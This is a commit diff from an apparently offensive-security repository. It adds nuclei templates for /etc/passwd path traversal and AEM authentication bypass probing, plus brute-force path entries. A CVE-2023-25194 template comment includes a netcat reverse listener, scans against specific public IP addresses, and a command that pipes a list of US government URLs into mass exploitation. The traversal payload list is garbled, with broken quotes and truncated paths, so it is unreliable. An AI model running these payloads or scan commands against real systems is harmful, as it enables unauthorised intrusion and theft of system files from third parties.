GhostTroops
diff --git a/‎brute/dicts/filedic.txt
Lines changed: 8 additions & 0 deletions b/‎brute/dicts/filedic.txt
Lines changed: 8 additions & 0 deletions
diff --git a/‎config/51pwn/CVE-2023-25194.yaml
Lines changed: 1 addition & 1 deletion b/‎config/51pwn/CVE-2023-25194.yaml
Lines changed: 1 addition & 1 deletion
diff --git a/‎config/51pwn/TPALL/2.yaml
Lines changed: 110 additions & 0 deletions b/‎config/51pwn/TPALL/2.yaml
Lines changed: 110 additions & 0 deletions
diff --git a/‎config/51pwn/TPALL/74cms-workflow.yaml
Lines changed: 13 additions & 0 deletions b/‎config/51pwn/TPALL/74cms-workflow.yaml
Lines changed: 13 additions & 0 deletions
diff --git a/‎config/51pwn/TPALL/AEM_misconfig.yaml
Lines changed: 33 additions & 0 deletions b/‎config/51pwn/TPALL/AEM_misconfig.yaml
Lines changed: 33 additions & 0 deletions
@@ -7050,6 +7050,14 @@ $metadata
 /example.php
 /examples
 /examples/
+/conf5
+/privacy/policy/ms/version
+/v5/gc
+/v5/gcf
+/snsconf
+/v5/gcl
+/v4/imopenstat/im_native_sdk_report
+/privacy/policy/authorization/status
 /examples/index.html
 /examples/jsp/index.html
 /examples/jsp/jsp2/misc/config.jsp
 
@@ -22,7 +22,7 @@ info:
     nc -nlvp 9999
     nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u  http://176.79.33.152:7001
     nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://135.181.39.55:8123
-    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -v
+    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|sort -u|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -json -o us_gov_CVE-2023-25194.json
   reference:
     - https://hackerone.com/reports/1529790
     - https://github.com/ohnonoyesyes/CVE-2023-25194
 
@@ -0,0 +1,110 @@
+id: Etc-file
+
+
+
+info:
+  name: Etc File Read
+  author: Saimon
+  severity: high
+  description: Finds etc password files
+  
+
+ 
+
+requests:
+  - method: GET
+    
+    path:
+    -  |
+          -  "{{BaseURL}}swd"
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}tc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}"
+          -  "{{BaseURL}}"
+          -  "{{BaseURL}}asswd"
+          -  "{{BaseURL}}etc/passwd"
+          -  "{{BaseURL}}.%2f/etc/passwd"
+          -  "{{BaseURL}}.%2f..%2f/etc/passwd"
+          -  "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}e//etc/passwd"
+          -  "{{BaseURL}}e/%2e%2e//etc/passwd"
+          -  "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
+          -  "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
+          -  "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}swd"
+          -  "{{BaseURL}}f/etc/passwd"
+          -  "{{BaseURL}}f%2e%2e%2f/etc/passwd"
+          -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
+          -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
+          -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
+          -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}2f/etc/passwd"
+          -  "{{BaseURL}}2f..%252f/etc/passwd"
+          -  "{{BaseURL}}2f..%252f..%252f/etc/passwd"
+          -  "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
+          -  "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}/passwd"
+          -  "{{BaseURL}}e%252e//etc/passwd"
+          -  "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
+          -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
+          -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
+          -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
+          -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
+          -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}"
+          -  "{{BaseURL}}"
+          -  "{{BaseURL}}"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}swd"
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}tc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}5c/etc/passwd"
+          -  "{{BaseURL}}5c..%255c/etc/passwd"
+          -  "{{BaseURL}}5c..%255c..%255c/etc/passwd"
+          -  "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
+          -  "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}asswd"
+          -  "{{BaseURL}}etc/passwd"
+          -  "{{BaseURL}}.%5c/etc/passwd"
+          -  "{{BaseURL}}.%5c..%5c/etc/passwd"
+          -  "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
+          -  "{{BaseURL}}""
+          -  "
+          -  "{{BaseURL}}passwd"
+          -  "{{BaseURL}}e\/etc/passwd"
+          -  "{{BaseURL}}e\%2e%2e\/etc/passwd"
+      
+    matcher-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex: 
+          - "root:[x*] :0:0"
+          - "\\[(font|extension|file)s\\]"
+        
+        part: body
@@ -0,0 +1,13 @@
+id: 74cms-workflow
+
+info:
+  name: 74cms Security Checks
+  author: daffainfo
+  description: A simple workflow that runs all 74cms related nuclei templates on a given target.
+
+workflows:
+  - template: technologies/fingerprinthub-web-fingerprints.yaml
+    matchers:
+      - name: 74cms
+        subtemplates:
+          - tags: 74cms
@@ -0,0 +1,33 @@
+id: aem-misconfigs
+
+info:
+  name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
+  author: panch0r3d
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css"
+      - "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js"
+      - "{{BaseURL}}/crx/de/index.jsp?.js"
+      - "{{BaseURL}}/crx/explorer/browser/index.jsp?.css"
+      - "{{BaseURL}}/crx/packmgr/index.jsp?.json"
+      - "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
+      - "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js"
+      - "{{BaseURL}}/libs/granite/core/content/login.html?.ico"
+      - "{{BaseURL}}/etc/reports/diskusage.html?.html"
+      - "{{BaseURL}}///crx///de///index.jsp?.css"
+      - "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(success).*?["][:](true).*?["](results)'
+          - '(CRXDE).(Lite)'
+          - '(Content).(Explorer)'
+          - '(CRX).(Package).(Manager)'
+          - '(Adobe)'
+        part: body